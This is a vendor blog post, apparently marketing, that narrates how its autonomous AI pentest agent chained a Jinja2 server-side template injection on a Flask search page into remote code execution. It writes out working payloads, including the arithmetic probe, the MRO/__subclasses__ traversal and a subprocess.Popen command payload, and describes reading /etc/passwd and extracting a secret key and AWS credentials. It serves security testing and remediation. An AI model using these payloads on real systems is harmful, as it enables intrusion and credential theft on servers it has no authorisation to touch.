SSTI to RCE: How Revelion Exploited a Template Injection in Under 60 Seconds
Server-Side Template Injection sits in a category of vulnerabilities that scanners systematically underreport. They detect the symptom (user input reflected in rendered output) and flag it as medium severity. But SSTI in modern template engines like Jinja2, Twig, and Freemarker frequently chains directly to Remote Code Execution, making it one of the most dangerous web vulnerability classes when it appears. This is a step-by-step breakdown of how Revelion's autonomous agents went from initial discovery to proven RCE in 47 seconds.
T+0s: Recon Agent Identifies the Injection Surface
The recon agent is crawling the target application, a Python/Flask web app with a user-facing search feature. The search page at /search?q=test renders the search term directly in the page body: “Showing results for: test.” The recon agent flags this as a potential template injection surface because the user input is being rendered server-side, not client-side through JavaScript DOM manipulation. The response contains no X-Content-Type-Options or CSP headers, but more importantly, the HTML source shows the search term is embedded directly in the template output without escaping through a safe filter.
At this point, the recon agent has a hypothesis, not a confirmed finding. The input is reflected in rendered output, which could be simple string concatenation, client-side rendering, or actual template evaluation. The distinction matters enormously. The recon agent tags this endpoint as a high-priority candidate for template injection testing and propagates it to the injection agent through the shared context graph.
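The distinction comes down to how the view builds its response: whether user input becomes template *data* or template *source*. A minimal sketch of both patterns, assuming Jinja2 directly (function names are illustrative, not taken from the target application):

```python
from jinja2 import Template

def render_results_vulnerable(q: str) -> str:
    # BUG: user input is concatenated into the template source itself,
    # so Jinja2 evaluates any {{ ... }} expressions the user supplies.
    return Template("Showing results for: " + q).render()

def render_results_safe(q: str) -> str:
    # Fix: user input is passed as template data, never template source.
    return Template("Showing results for: {{ q }}").render(q=q)

print(render_results_vulnerable("{{ 7*7 }}"))  # evaluated: "Showing results for: 49"
print(render_results_safe("{{ 7*7 }}"))        # inert: "Showing results for: {{ 7*7 }}"
```

Both versions reflect the input in rendered output, which is why reflection alone cannot distinguish them; only a probe that forces evaluation can.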
T+6s: Injection Agent Confirms SSTI with Arithmetic Probe
The injection agent sends its first probe: /search?q={{ 7*7 }}. The response body contains “Showing results for: 49.” The template engine evaluated the arithmetic expression and returned the result. SSTI is confirmed.
This is the critical moment where a scanner and an AI pentester diverge completely. A scanner would log this as “Server-Side Template Injection - Medium Severity” with a CVSS score somewhere around 5.3 to 6.1, depending on the tool's assessment of potential impact. The remediation advice would be generic: “Avoid passing user input to template engines” or “Use sandboxed template rendering.” The scanner moves on to the next endpoint.
Revelion's injection agent does not move on. It has confirmed that the template engine evaluates expressions. The next question is: which template engine, and what is the exploitation ceiling? The agent needs to determine whether this SSTI can reach code execution or whether the template engine's sandbox restricts it to expression evaluation only.
T+11s: Template Engine Fingerprinting
The injection agent sends a series of engine-specific payloads to identify the template engine. It tests {{ 7*'7' }}, which returns “7777777” (the string '7' repeated seven times). This behaviour is characteristic of Jinja2: it treats the multiplication of an integer by a string as string repetition, consistent with Python's semantics. Twig would return “49” (it coerces the string to integer). Freemarker would throw an error. The agent confirms Jinja2 with high confidence.
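The behavioural difference the probe exploits is plain Python semantics, which Jinja2 inherits. The decision logic below is a simplified sketch of the fingerprinting idea, not Revelion's actual code:

```python
# Python (and therefore Jinja2) treats int * str as string repetition.
assert 7 * '7' == '7777777'

def guess_engine(probe_result: str) -> str:
    # Simplified decision tree: what did {{ 7*'7' }} render as?
    if probe_result == '7777777':
        return 'Jinja2'   # Python semantics: string repetition
    if probe_result == '49':
        return 'Twig'     # PHP semantics: string coerced to integer
    return 'unknown'      # e.g. Freemarker raises a template error instead

print(guess_engine('7777777'))  # Jinja2
```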
Knowing the engine is Jinja2 on Python/Flask is significant because Jinja2's default configuration does not sandbox template execution. Unlike some template engines that restrict access to a whitelist of functions, Jinja2 exposes Python's full object hierarchy through the template context. If the agent can navigate from a base object to Python's subprocess or os modules, code execution is achievable.
T+18s: Escalating from Expression Evaluation to Python Builtins
The agent begins navigating Python's Method Resolution Order (MRO) to access restricted classes. It sends: {{ ''.__class__.__mro__[1].__subclasses__() }}. This payload starts with an empty string object, traverses up to the base object class via MRO, and lists all subclasses registered in the Python runtime. The response is a massive list of class references.
The agent parses this list programmatically, searching for classes that provide file system or process execution capabilities. It identifies subprocess.Popen at index 351 in the subclasses list. This is the pivot point. subprocess.Popen allows arbitrary command execution on the host operating system.
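Stripped of the template delimiters, the traversal is ordinary Python introspection. A sketch of the same walk run directly in Python (subprocess is imported here so that Popen is registered in the runtime; in the target app the web stack had already loaded it):

```python
import subprocess  # ensures subprocess.Popen is registered as a subclass of object

# ''.__class__ is str; __mro__[1] walks up to the base `object` class.
base = ''.__class__.__mro__[1]
assert base is object

# Every class loaded in the runtime descends from object.
subs = base.__subclasses__()

# Programmatic search for an execution primitive, instead of
# eyeballing a 400+ entry list by hand.
popen_index = next(i for i, cls in enumerate(subs) if cls.__name__ == 'Popen')
print(popen_index, subs[popen_index])
```

The index (351 on this target) varies between Python versions and even between processes, which is why the agent resolves it at runtime rather than reusing a hardcoded payload.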
This step is where the exploitation gets technically dense, and it is also where manual exploitation typically stalls. A human researcher would need to manually inspect the subclasses list (which often contains 400+ entries), identify the right class index, and construct the correct payload syntax. This is a tedious, error-prone process that involves trial and error. The agent does it programmatically in seconds.
T+31s: Achieving Remote Code Execution
The agent constructs the RCE payload: {{ ''.__class__.__mro__[1].__subclasses__()[351]('id', shell=True, stdout=-1).communicate()[0] }}. The response contains: uid=1000(www-data) gid=1000(www-data) groups=1000(www-data).
Remote Code Execution is confirmed. The template injection allows arbitrary command execution on the host, running as the www-data user. The agent has gone from a search field that reflects user input to executing operating system commands, without any human intervention and without any prior knowledge of the application's technology stack beyond what it discovered through probing.
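Outside the template delimiters, the payload's tail is ordinary subprocess usage: stdout=-1 works because -1 is the literal value of subprocess.PIPE, letting the payload avoid naming the subprocess module at all. A harmless stand-in (echo rather than id, so it runs anywhere):

```python
import subprocess

# -1 is the integer value of subprocess.PIPE, which is why the template
# payload can request a captured stdout without referencing the constant.
assert subprocess.PIPE == -1

out = subprocess.Popen('echo proof', shell=True, stdout=-1).communicate()[0]
print(out)
```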
The agent does not stop at proving command execution. It needs to demonstrate the full impact for the report to be actionable.
T+38s: Proving File System Access
The agent reads /etc/passwd to prove file system access. The response returns the full contents of the passwd file, confirming that the www-data user has read access to system files. It also reads the application's config.py file, extracting the database connection string, the Flask secret key, and an AWS access key that was hardcoded in the configuration.
Each of these reads is captured as a request/response pair in the evidence log. The report will contain the exact HTTP requests sent, the exact responses received, and the exact data extracted. There is no ambiguity about whether this vulnerability is exploitable. The proof is complete and reproducible.
T+47s: Full Proof-of-Concept Documented
At 47 seconds from initial discovery, the agent has completed the full kill chain and documented every step. The final report contains:
- The initial discovery: reflected input in template-rendered output
- SSTI confirmation: arithmetic evaluation proof (7*7 = 49)
- Engine identification: Jinja2 on Python/Flask
- Exploitation escalation: MRO traversal to subprocess.Popen
- RCE proof: id command output showing the www-data execution context
- Impact demonstration: /etc/passwd read, application config extraction, credential exposure
- Every HTTP request and response pair, timestamped and sequenced
The CVSS score is recalculated based on proven impact, not theoretical risk. This is not a “possible SSTI (medium)” finding. It is a confirmed SSTI-to-RCE chain with demonstrated file system access and credential extraction: CVSS 9.8, with evidence that makes the rating indisputable.
The Manual Comparison: 30-60 Minutes for the Same Chain
A skilled penetration tester running through this same chain manually would follow an identical logical process. The difference is time and consistency. The manual process looks like this:
First, the researcher identifies the reflected input and suspects template injection. They test with {{7*7}} and confirm SSTI. This takes 2-5 minutes, including the time to notice the injection point during manual crawling. Next, they fingerprint the template engine using a decision tree (usually referencing PortSwigger's SSTI methodology or their own notes). Another 3-5 minutes. Then they begin constructing the MRO traversal payload. This is where the time expands significantly. The researcher needs to dump the subclasses list, search through hundreds of entries, identify a useful class, determine its index, and build the correct payload syntax. Depending on experience and whether they have pre-built payloads in their notes, this takes 10-30 minutes. Factor in false starts, typos in the payload, and the occasional need to URL-encode nested quotes, and a 30-60 minute timeline is realistic.
Revelion completes the same chain in 47 seconds because it does not hesitate between steps, does not make transcription errors, does not need to look up payload syntax, and does not lose time context-switching between testing and documentation. It also captures every request/response pair automatically, eliminating the post-exploitation documentation phase that typically adds another 15-30 minutes to a manual engagement.
The Scanner Comparison: “Possible SSTI (Medium)”
A vulnerability scanner testing the same endpoint would send a basic probe, detect that user input is reflected in rendered output, and flag it as “possible Server-Side Template Injection.” The severity would be medium, possibly high if the scanner has a rule that escalates SSTI findings. The report would include a description of what SSTI is, a generic remediation recommendation, and no proof of exploitability.
The scanner cannot confirm which template engine is running. It cannot navigate the MRO to find exploitable classes. It cannot prove code execution. It cannot demonstrate file system access. The finding would sit in a report alongside 200 other medium-severity items, competing for remediation attention with missing security headers and cookie flags. The team receiving the report has no way to prioritize it because the scanner could not prove what an attacker could actually do with it.
This is the gap that generates real-world breaches. The vulnerability exists. A scanner detected it, technically. But without proof of impact, it gets deprioritized. It sits in a backlog for months. Meanwhile, a human attacker or a less scrupulous autonomous AI system finds the same SSTI and runs the same chain. The difference between “possible SSTI (medium)” and “confirmed SSTI-to-RCE with credential extraction (critical)” is the difference between a backlog item and an incident response.
Why This Matters for Your Security Programme
SSTI-to-RCE is not a rare or exotic attack. It appears regularly in bug bounty programmes, in CTF challenges, and in production applications. Jinja2, Twig, Freemarker, Velocity, Pebble: template injection exists across every major web framework ecosystem. The exploitation techniques are well-documented, and the tooling (both offensive and defensive) is mature.
The question is not whether SSTI exists in your applications. It is whether your current testing methodology would catch it, prove it, and report it with enough evidence to drive immediate remediation. If your security testing produces reports that say “possible template injection” without proving the exploitation chain, you are relying on your development team to assume the worst-case scenario for every medium-severity finding. That does not happen. It has never happened at any organisation, at any scale.
For a deeper look at how the agent architecture enables this kind of rapid, autonomous exploitation, read our complete guide to autonomous AI pentesting. To understand how AI pentesting compares to traditional scanning across a broader range of vulnerability classes, see AI pentesting vs vulnerability scanning.
See what Revelion finds in your applications. Start free with 20,000 credits.
Related Content
What is Autonomous AI Pentesting?
A comprehensive guide to autonomous AI penetration testing: how intelligent agents perform reconnaissance, exploitation, and reporting without manual intervention, with real benchmark results.
AI Pentesting vs Vulnerability Scanning: What Actually Changes
Vulnerability scanners check for known signatures. AI pentesting thinks, adapts, and proves exploitability. Here's what actually changes, and why it matters for your security posture.